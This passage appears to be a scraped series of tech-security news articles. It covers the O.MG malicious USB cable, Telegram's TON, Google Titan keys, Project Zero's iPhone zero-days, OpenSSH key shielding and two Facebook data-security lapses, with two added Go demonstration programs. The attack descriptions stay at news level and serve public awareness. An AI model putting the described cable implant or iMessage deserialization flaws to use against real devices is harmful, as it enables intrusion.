Per Motherboard, MG made these cables by hand, painstakingly modifying real Apple cables to include the implant. MG told Motherboard, "It looks like a legitimate cable and works just like one. Not even your computer will notice a difference. Until I, as an attacker, wirelessly take control of the cable.” These cables, named “O.MG cables”, are visually indistinguishable from the originals. They also work like a genuine cable, letting users charge their devices over USB or transfer files from their iOS devices.

MG not only showcased the implanted cable at DefCon but has also put similar cables on sale for $200. "There has been a lot of interest and support behind this project," MG says on his blog, "and lots of requests on how to acquire a cable. That's a great feeling!"

Once the cable is plugged into a device, it enables an attacker to mount a wireless hijack of the computer. “Once plugged in, an attacker can remotely control the affected computer to send realistic-looking phishing pages to a victim’s screen, or remotely lock a computer screen to collect the user’s password when they log back in,” TechCrunch writes. “In the test with Motherboard, MG connected his phone to a wifi hotspot emanating out of the malicious cable in order to start messing with the target Mac itself. MG typed in the IP address of the fake cable on his own phone's browser and was presented with a list of options, such as opening a terminal on my Mac. From here, a hacker can run all sorts of tools on the victim's computer”, Motherboard’s Joseph Cox writes.

Asked how close an attacker needs to be to the plugged-in cable, MG said, "I’m currently seeing up to 300 feet with a smartphone when connecting directly." “A hacker could use a stronger antenna to reach further if necessary. But the cable can be configured to act as a client to a nearby wireless network. And if that wireless network has an internet connection, the distance basically becomes unlimited," he added.

MG now wants to get the cables produced as a legitimate security tool; he said the company Hak5 is on board with making that happen. These cables would be made from scratch rather than from modified Apple ones, according to Motherboard. MG said, "Apple cables are simply the most difficult to do this to, so if I can successfully implant one of these, then I can usually do it to other cables."

How can one avoid getting tricked by the dummy USB Lightning cables?

Users should not trust a random cable lying around just because its external packaging looks genuine. One should also avoid accepting unsolicited chargers, USB dongles, or similar components as gifts from people they do not trust, and avoid borrowing chargers from people they do not know. When purchasing any tech component, users should buy from legitimate online sources or from physical stores where the packaging has not been tampered with. In public places, one should always keep their devices, cables, USB dongles, and other components nearby and secure.

A user on Hacker News was infuriated that the major operating system vendors (Windows, macOS, and Linux) have not implemented these basic precautions: “It's a severe discredit to the major operating system vendors that plugging in a USB stick can still compromise a system.” The user further adds, “If a USB device identifies itself as a keyboard, the system shouldn't accept its keystrokes until either that keyboard has typed the user's login password, or the user uses a different input device to authorize it. If it identifies itself as a storage device, the filesystem driver should be hardened. If it identifies itself as an obscure 90s printer with a buggy driver written in C, it should prompt the user to confirm the device type before it loads the driver.” Another user on Hacker News wondered how one could ensure the cables sold online are legitimate; he writes, “Even more frightening, people selling them as seemingly legitimate cables on Amazon? People will pay you and you get a new botnet. How many could you sell before it's discovered? How can I, as a consumer, even tell? Amazon will even allow you to sell your malcable under the Apple brand.”

To know more about this news in detail, head over to Motherboard’s complete report.
TON: Telegram’s decentralized blockchain network faces mixed reactions from financial regulators as more information is needed

Amrata Joshi
01 Oct 2019
5 min read
Telegram is now joining the blockchain league with Telegram Open Network (TON), Telegram’s blockchain network. TON will bring blockchain payments to Telegram’s 365 million users by the end of October. Earlier this month, Telegram released half a million lines of code for TON, new documentation, and a beta. According to Decrypt, “If TON delivers on promises of high speeds and decentralization, it’d be the largest blockchain launch in history.”

Regulators raised their voice against Facebook’s Libra

Regulators had raised their voice against Facebook's cryptocurrency, Libra, and Libra’s launch has been pushed back because it could lead to serious security issues. Congress has already drafted bills to ban Libra. Maxine Waters, chairwoman of the Committee on Financial Services, said in a letter to Facebook, “It appears that these products may lend themselves to an entirely new global financial system that is based out of Switzerland and intended to rival U.S. monetary policy and the dollar.” It further reads, “This raises serious privacy, trading, national security, and monetary policy concerns for not only Facebook's over 2 billion users, but also for investors, consumers, and the broader global economy.” France is blocking Libra: according to The Independent, Bruno Le Maire, Economy and Finance Minister of France, said, “I want to be absolutely clear: In these conditions, we cannot authorize the development of Libra on European soil.”

Regulators need more information on TON and so are unable to judge it

Now the question arises: how will TON survive under the regulators’ strict eye? Most regulators haven’t commented on TON, and a few others think that more information on TON is needed. A spokesperson from the German Central Bank said, “We do not possess any specific information on TON. That's why we cannot comment on this app.” A spokesperson from the European Data Protection Supervisor, a regulatory body on privacy, said, “There is not much info indeed.” He further added, “Telegram will have to apply the GDPR; no specific TON regulation is needed here. Telegram will have to fulfill all compliance obligations.” These comments from the regulators don’t give any clarity on TON.

Mitja Goroshevsky, CTO of TON Labs, pointed out that the lack of interest from regulators is because the Facebook-led Libra Association is quite different from TON. According to Mitja, Libra isn’t decentralized, whereas TON is a decentralized blockchain. A few other regulators think that TON doesn’t violate any laws but might face criticism from the authorities who protect the financial system. According to others, TON needs a model in which it is responsible for controlling all the validators. In a statement to Decrypt, Pavel Prigolovko, Vice President, Strategy, TON Labs, said, “TON has to switch from a model where all the validators are controlled by TON itself during the launch, to one where the community controls the majority of the validators.” Prigolovko further added, “This transition depends on the technical availability of the large Gram holders to become validators. There are quite a few technical challenges to become a validator, like setting up a reliable infrastructure with proper processes, scripts [and] monitoring.”

TON will require KYC details concerning user data

Some regulators are sceptical about where user data will be stored, as Telegram hasn’t provided enough details. As wallets will be linked, it is important to have clarity on where the data will be stored. TON will require KYC details, and users will have to follow KYC regulations. Mitesh Shah, CEO of blockchain analytics company Omnia Markets Inc, said that Telegram has given little information about where and how user data is stored. “There are more users here than on any other chain, and having it stored in a proper place is one of the largest concerns.” Goroshevsky noted that neither Telegram nor TON would require KYC functionality. That said, users will have to adhere to the KYC regulations of individual exchanges when buying or cashing out Grams.

Though KYC details are unique to an individual, the platform can still be abused: some terrorists already use Telegram to promote their campaigns, and users can create fake accounts and misuse the platform to hide the transfer of money. Last month, Steven Stalinsky of the Middle East Media Research Institute told Decrypt about concerns that TON would be exploited by terrorists, who already use Telegram to promote violent campaigns. Even if KYC were implemented, Telegram wouldn’t be able to prevent subversive groups from using fake accounts to hide the transfer of money.

On the contrary, according to Goroshevsky, since TON is a decentralized blockchain, it wouldn’t collect user data and will be transparent. Goroshevsky said, “TON is not collecting user data hence it is not going to store it. TON is a decentralized blockchain and as any such blockchain, it will be fully open and transparent. And of course, that means all transaction details will be public, like on any other public ledger.” Considering the mixed reactions from regulators, it will be interesting to see whether TON gets approval for its launch or faces the same fate as Facebook’s Libra. To know more about this news in detail, check out Decrypt’s post.
Google Titan Security key with secure FIDO two factor authentication is now available for purchase

Prasad Ramesh
31 Aug 2018
3 min read
In July, Google announced the Titan Security Keys, built with a hardware chip to verify key integrity. They are now available for purchase from the Google Store. The security key looks like a dongle and provides two-factor authentication, which is more secure than just a username and password. Titan keys are based on the FIDO standards, which Google considers the strongest and most phishing-resistant two-factor authentication method. The key was initially made available only to Google Cloud users; now it is available to the public.

How does the Google Titan key protect your account?

Security keys are based on a standard public key cryptography protocol. The client first registers a public key with the online service. Then, for each authentication, the online service asks the client to prove ownership of the corresponding private key with a cryptographic signature. Google jointly contributed the two-factor authentication technical specifications to the FIDO Alliance and launched support for Gmail in 2014. The company has been working with Yubico and NXP on security keys since 2012. In a Google Cloud Blog post, Christiaan Brand, Product Manager, Google Cloud, stated, “At Google, we have had no reported or confirmed account takeovers due to password phishing since we began requiring security keys as a second factor for our employees.”

Google has engineered the firmware in the chips with security in mind. The firmware is permanently sealed in a secure hardware chip and is resilient to hardware attacks, so the security factor is sealed into the chip itself during manufacture. FIDO has standardized the authentication protocol used between client and server. The protocol is implemented in operating systems like Android and Chrome OS, as well as in the Chrome browser. The security keys can be used to authenticate to services like Google, Dropbox, Facebook, GitHub, Salesforce, Stripe, and Twitter.

Do you need it?

If you have important information in your accounts or want stronger security as an individual or for your organization, the Google Titan key is a good option. It is available for $50 in the Google Store (US only for now) and includes a Bluetooth key and a USB key with the required connectors. For more details, visit the Google Cloud Blog.
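The register-then-sign flow described above, as an added Go example that is not Google's, Yubico's or the FIDO Alliance's code: the service stores only the public key, each login signs a fresh random challenge, and the signed data also covers the origin the browser reports (an assumed, simplified form of the FIDO origin binding). The origins and key material are constructed for the demonstration.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Credential is what the online service keeps after registration: the public
// key bound to the origin it was registered for. No secret is stored server-side.
type Credential struct {
	Origin string
	Public *ecdsa.PublicKey
}

// SecurityKey models the token: it holds the private key and only ever
// releases signatures, never the key itself.
type SecurityKey struct {
	priv *ecdsa.PrivateKey
}

// NewSecurityKey generates a fresh P-256 key pair inside the token.
func NewSecurityKey() (*SecurityKey, error) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	return &SecurityKey{priv: priv}, nil
}

// Register returns the public key the service stores for this origin.
func (k *SecurityKey) Register(origin string) Credential {
	return Credential{Origin: origin, Public: &k.priv.PublicKey}
}

// signedData binds the service's challenge to the origin the client is
// talking to. The browser, not the user, supplies the origin, which is what
// makes the scheme phishing resistant (assumed simplified binding).
func signedData(origin string, challenge []byte) []byte {
	h := sha256.New()
	h.Write([]byte(origin))
	h.Write(challenge)
	return h.Sum(nil)
}

// Sign is the client-side authentication step: prove possession of the private
// key over the challenge as seen from clientOrigin.
func (k *SecurityKey) Sign(clientOrigin string, challenge []byte) ([]byte, error) {
	return ecdsa.SignASN1(rand.Reader, k.priv, signedData(clientOrigin, challenge))
}

// NewChallenge is the service side: a fresh random nonce per login attempt,
// so a previously captured signature cannot be replayed.
func NewChallenge() ([]byte, error) {
	c := make([]byte, 32)
	_, err := rand.Read(c)
	return c, err
}

// Verify is the service side: the signature must verify under the registered
// public key over the challenge the service issued and the registered origin.
func Verify(cred Credential, challenge, sig []byte) error {
	if !ecdsa.VerifyASN1(cred.Public, signedData(cred.Origin, challenge), sig) {
		return errors.New("signature does not match registered key, origin and challenge")
	}
	return nil
}

func main() {
	key, _ := NewSecurityKey()
	cred := key.Register("https://accounts.example.com") // constructed origin
	chal, _ := NewChallenge()

	// Legitimate login from the registered origin verifies.
	sig, _ := key.Sign("https://accounts.example.com", chal)
	fmt.Println("registered origin:", Verify(cred, chal, sig))

	// A lookalike origin gets a signature over different data, so it fails.
	other, _ := key.Sign("https://accounts-example.com.invalid", chal)
	fmt.Println("lookalike origin:", Verify(cred, chal, other))

	// An old signature presented against a new challenge fails too.
	chal2, _ := NewChallenge()
	fmt.Println("stale signature:", Verify(cred, chal2, sig))
}
```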
Google’s Project Zero reveals several serious zero-day vulnerabilities in a fully remote attack surface of the iPhone

Sugandha Lahoti
08 Aug 2019
4 min read
Security analysts from Google’s Project Zero investigated the remote attack surface of the iPhone, reviewing SMS, MMS, Visual Voicemail (VVM), email, and iMessage. They found several serious zero-day vulnerabilities in the remote, interaction-less attack surface of the iPhone. The majority of the vulnerabilities were in iMessage, due to its broad and difficult-to-enumerate attack surface. Visual Voicemail also had a large and unintuitive attack surface that likely led to a single serious vulnerability being reported in it.

Vulnerability in Visual Voicemail

Visual Voicemail (VVM) is a feature of mobile devices that allows voicemail to be read in an email-like format. It informs devices of the location of the IMAP server by sending a specially formatted SMS message containing the URL of the IMAP server. Any device can send a message that causes Visual Voicemail to query an IMAP server specified in the message, so an attacker can force a device to query an IMAP server they control without the user interacting with the device in any way. The vulnerability reachable this way is an object lifetime issue in the iPhone IMAP client: when a NAMESPACE command response contains a namespace that cannot be parsed correctly, the mailbox separator is freed but not replaced with a valid object, and a selector is later called on that invalid object. This vulnerability was assigned CVE-2019-8613 and was fixed on Tuesday, May 14.

Vulnerabilities in iMessage

CVE-2019-8624: A bug was found in the Digital Touch extension which led to a crash in SpringBoard requiring no user interaction. This extension allows users to send messages containing drawings and other visual elements. This bug was fixed in Apple’s July 24 update.

CVE-2019-8663: This vulnerability was found in deserializing the SGBigUTF8String class, which is a subclass of NSString. The initWithCoder: implementation of this class deserializes a byte array that is then treated as a UTF-8 string with a null terminator, even if it does not have one. This can lead to a string being created that contains out-of-bounds memory.

CVE-2019-8661: This vulnerability is present in [NSURL initWithCoder:] and affects Mac only. It results in a heap overflow in [NSURL initWithCoder:] that can be reached via iMessage and likely other paths, and crashes soagent with no user interaction. The issue was resolved by removing CarbonCore from the NSURL deserialization path. It was fixed on Saturday, Aug 3, 2019.

CVE-2019-8646: This vulnerability allows the class _NSDataFileBackedFuture to be deserialized even if secure encoding is enabled. Classes do not need to be public or exported to be available for deserialization. This issue was fixed in iOS 12.4 by preventing this class from being decoded unless it is explicitly added to the allow list. Better filtering of the file URL was also implemented.

CVE-2019-8647: It occurs when deserializing the class _PFArray, which extends NSArray and implements [_PFArray initWithObjects:count:], which is called by [NSArray initWithCoder:]. This vulnerability results in NSArray deserialization invoking a subclass that does not retain references. The issue can be reached remotely via iMessage and crashes SpringBoard with no user interaction. It was fixed in 12.4 by implementing [_PFArray classForKeyedUnarchiver] and similar methods that return NSArray.

CVE-2019-8660: This vulnerability involved cycles in serialized objects. There is a memory corruption vulnerability when decoding an object of class NSKnownKeysDictionary1. It was fixed in iOS 12.4 with improved length checking.

They found another vulnerability, CVE-2019-8641, which they are not yet disclosing because its fix did not fully remediate the issue.

The analysts concluded that reducing the remote attack surface of the iPhone would likely improve its security. You can read their complete analysis on Project Zero’s blog.
OpenSSH code gets an update to protect against side-channel attacks

Savia Lobo
24 Jun 2019
2 min read
Last week, Damien Miller, a Google security researcher and one of the well-known OpenSSH and OpenBSD developers, announced an update to the OpenSSH code that helps protect against side-channel attacks that leak sensitive data from a computer’s memory. This protection, Miller says, will guard private keys residing in RAM against Spectre, Meltdown, Rowhammer, and the latest RAMBleed attack. SSH private keys can be used by malicious threat actors to connect to remote servers without needing a password. According to CSO, “The approach used by OpenSSH could be copied by other software projects to protect their own keys and secrets in memory”.

With this change, an attacker who succeeds in extracting data from a computer or server's RAM obtains only an encrypted version of an SSH private key, rather than the cleartext version. In an email to OpenBSD, Miller writes, “this change encrypts private keys when they are not in use with a symmetric key that is derived from a relatively large 'prekey' consisting of random data (currently 16KB)." He further adds, "Attackers must recover the entire prekey with high accuracy before they can attempt to decrypt the shielded private key, but the current generation of attacks have bit error rates that, when applied cumulatively to the entire prekey, make this unlikely”. "Implementation-wise, keys are encrypted 'shielded' when loaded and then automatically and transparently unshielded when used for signatures or when being saved/serialised," Miller said. The OpenSSH developers hope they'll be able to remove this special protection against side-channel attacks "in a few years time when computer architecture has become less unsafe", Miller said at the end of the patch. To know more about this announcement in detail, visit Damien Miller’s email.
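The shielding idea Miller describes, as an added Go example that is not OpenSSH's own code: the private key is encrypted under a key derived from a large random prekey, so an attacker's copy of the prekey must be bit-exact before the shielded key can be decrypted. Deriving the AES-256 key and CTR IV from a single SHA-512 of the prekey is an assumption made for this example; the sample key bytes are constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha512"
	"fmt"
)

// PrekeySize mirrors the 16 KB of random data mentioned in the announcement.
const PrekeySize = 16 * 1024

// ShieldedKey is a private key kept encrypted while it is not in use.
type ShieldedKey struct {
	Prekey     []byte // large random prekey; all of it is needed to unshield
	Ciphertext []byte // private key encrypted with AES-256-CTR
}

// deriveKeyIV hashes the whole prekey with SHA-512 and splits the digest into
// a 32-byte AES-256 key and a 16-byte CTR IV. Every bit of the prekey feeds
// the digest, so one bit error in a recovered prekey yields a different key.
// (Assumed construction for this example.)
func deriveKeyIV(prekey []byte) (key, iv []byte) {
	digest := sha512.Sum512(prekey)
	return digest[:32], digest[32:48]
}

// ctrXOR applies AES-CTR with the given key and IV; CTR is symmetric, so the
// same call both shields and unshields.
func ctrXOR(key, iv, in []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(in))
	cipher.NewCTR(block, iv).XORKeyStream(out, in)
	return out, nil
}

// Shield encrypts private key material under a fresh random prekey.
func Shield(private []byte) (*ShieldedKey, error) {
	prekey := make([]byte, PrekeySize)
	if _, err := rand.Read(prekey); err != nil {
		return nil, err
	}
	key, iv := deriveKeyIV(prekey)
	ct, err := ctrXOR(key, iv, private)
	if err != nil {
		return nil, err
	}
	return &ShieldedKey{Prekey: prekey, Ciphertext: ct}, nil
}

// Unshield recovers the private key using a given prekey: the genuine one in
// normal use, or a noisy reconstruction of it in the side-channel scenario.
func Unshield(ct, prekey []byte) ([]byte, error) {
	key, iv := deriveKeyIV(prekey)
	return ctrXOR(key, iv, ct)
}

// FlipBit returns a copy of buf with one bit flipped, modelling a single bit
// error in a recovered prekey.
func FlipBit(buf []byte, bit int) []byte {
	out := append([]byte(nil), buf...)
	out[bit/8] ^= byte(1) << uint(bit%8)
	return out
}

func main() {
	private := []byte("constructed sample private key material") // constructed
	sk, err := Shield(private)
	if err != nil {
		panic(err)
	}
	good, _ := Unshield(sk.Ciphertext, sk.Prekey)
	bad, _ := Unshield(sk.Ciphertext, FlipBit(sk.Prekey, 12345))
	fmt.Println("exact prekey recovers key:   ", bytes.Equal(good, private))
	fmt.Println("one-bit error recovers key:  ", bytes.Equal(bad, private))
}
```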
Hundreds of millions of Facebook users’ phone numbers found online, thanks to an exposed server, TechCrunch reports

Fatema Patrawala
05 Sep 2019
4 min read
Yesterday, TechCrunch reported that an exposed server holding more than 419 million records of Facebook users’ phone numbers had been discovered online. According to Zack Whittaker, TechCrunch security reporter, the server was not protected with a password and was accessible to anyone. It featured 133 million records from U.S.-based Facebook users, 18 million records from users in the UK, and 50 million records on users in Vietnam. The records contained each person's unique Facebook ID along with the phone number listed on the account. Facebook IDs are unique numbers that can be associated with an account to discover a person's username.

TechCrunch was able to verify multiple records in the database by matching a known Facebook user's phone number against a listed Facebook ID. Other records were verified by matching phone numbers with Facebook's password reset feature, which can be used to partially reveal a phone number linked to an account. Records primarily had phone numbers, but in some cases also had usernames, genders, and country location. "This dataset is old and appears to have information obtained before we made changes last year to remove people's ability to find others using their phone numbers," a Facebook spokesperson said to TechCrunch. "The dataset has been taken down and we have seen no evidence that Facebook accounts were compromised," they added.

The database was originally discovered by security researcher and GDI Foundation member Sanyam Jain, who was able to locate phone numbers associated with several celebrities as well. It's not clear who owned the database or where it originated from, but it was taken offline after TechCrunch contacted the web host.

Phone number security has become increasingly important over the last few years due to SIM hacking (SIM swapping). This technique involves calling a phone carrier and asking for a SIM transfer for a specific number, thereby giving access to anything linked to that phone number, such as two-factor verification codes, password reset information, and more. Leaked phone numbers also expose Facebook users to spam calls, which have become more and more prevalent over the last several years.

Last week, security and privacy researcher Jane Manchun Wong showed, in a series of tweets, a Global Library Collector in the Facebook Android app’s code. According to Wong, this GLC allows the mobile app to upload data from the user’s device to Facebook servers. The tweet went viral and the general public had their say in it. https://twitter.com/wongmjane/status/1167463054709334017 Most responses from mobile app developers said that this is a known fact: Android phones upload system libraries to Facebook servers to check app stability, and the libraries do not contain any personal data. However, this report by TechCrunch is the latest security lapse involving Facebook and users’ personal data after a string of data breach incidents since the Cambridge Analytica scandal.

On Hacker News, the community expressed their distrust of Facebook’s statements. One user commented, “Facebook: "This dataset is old and appears to have information obtained before we made changes last year to remove people’s ability to find others using their phone numbers." Not that "old." Some of those "update" dates are just a few days ago.” Another user commented, “But the data appeared to be loaded into the exposed database at the end of last month — though that doesn’t necessarily mean the data is new. Somewhat curious what the Status key represents in this dump, personally.”
Cryptographic key of Facebook’s Free Basics app has been compromised

Fatema Patrawala
02 Sep 2019
5 min read
Last week, APK Mirror and Android Police owner Artem Russakovskii reported that a cryptographic key used by Facebook developers to digitally sign its Free Basics by Facebook app has been compromised, and third-party apps are reusing the key. https://twitter.com/ArtemR/status/1159867541537169409 Russakovskii discovered the issue and reported it to Facebook earlier in August. Facebook then pulled the original app listing from the Play Store and replaced it with a new app using a new signing key. Since then, the company has not publicly divulged the nature of the compromised key. It has also not given users any precise reason for the re-released app, leaving them at risk if they still have the old version installed. Before the listing was removed, the original Free Basics by Facebook app had over five million downloads on the Play Store.

Websites like APK Mirror host Android apps for download. They do so for several reasons: to circumvent censorship, so users can download updates before they're widely rolled out, to mitigate geographic restrictions, and to provide a historical archive for comparison and ease of rolling back updates, among others. Russakovskii writes, “In the last month, we've spotted third-party apps using a debug signing cryptographic key which matched the key used by Facebook for its Free Basics Android app.” The APK Mirror team notified Facebook about the leaked key, and the company verified it, pledging to address the issue in a new version of the app. The company claims it has prompted users to upgrade to the newer version of the app but did not provide any specific reason for the update.

Potential dangers of a compromised cryptographic key

According to Android Police, the security of Android app updates hinges on the secrecy of a given app's signing key. It is how app updates are verified as authentic, and if it falls into the wrong hands, false updates containing nefarious changes could be distributed. As a result, developers usually guard signing keys quite closely. That security is entirely dependent on developers keeping their app signing key secret; if it's publicly available, anyone can sign an app that claims to be an update to their app, and consumers' phones will install it right over the top of the real app. So losing or leaking a signing key is a big problem. If signing keys fall into the wrong hands, third parties can distribute maliciously modified versions of the app as updates through venues outside the Play Store, and potentially trick sites similar to APK Mirror that rely on signature verification. Someone could upload a fake app that looks like it was made by Facebook to a forum, or trick less wary APK distribution sites into publishing it based on the verified app signature.

To make things a bit easier for developers, Google has started a service which allows developers to store app signing keys on its servers instead. "Google Play App Signing," as it's called, means that app keys can't be lost, and compromised keys can be "upgraded" to new keys. Additionally, Android 9 Pie supports a new "key rotation" feature which securely verifies a lineage of signatures in case they need to be changed.

Facebook’s lax approach in addressing the security issue

According to APK Mirror, the old app is telling users to move to the new version, but no specific statement has been provided to customers. A spokesperson from Facebook told APK Mirror that users were simply notified of the requirement to upgrade in the old app. The APK Mirror team is unable to check the old app or the specific message sent to customers, as the Free Basics app doesn't appear to work outside specific markets. Additionally, the new app listing on the Play Store makes no mention that the security of the old app has been compromised by the leaked signing key, and the APK Mirror team did not find any disclosure about how this leak has impacted user security anywhere on Facebook's site or the internet.org site.

When asked for a statement, a Facebook spokesperson provided the following: “We were notified of a potential security issue that could have tricked people into installing a malicious update to their Free Basics app for Android if they chose to use untrusted sources. We have seen no evidence of abuse and have fixed the issue in the latest release of the app.”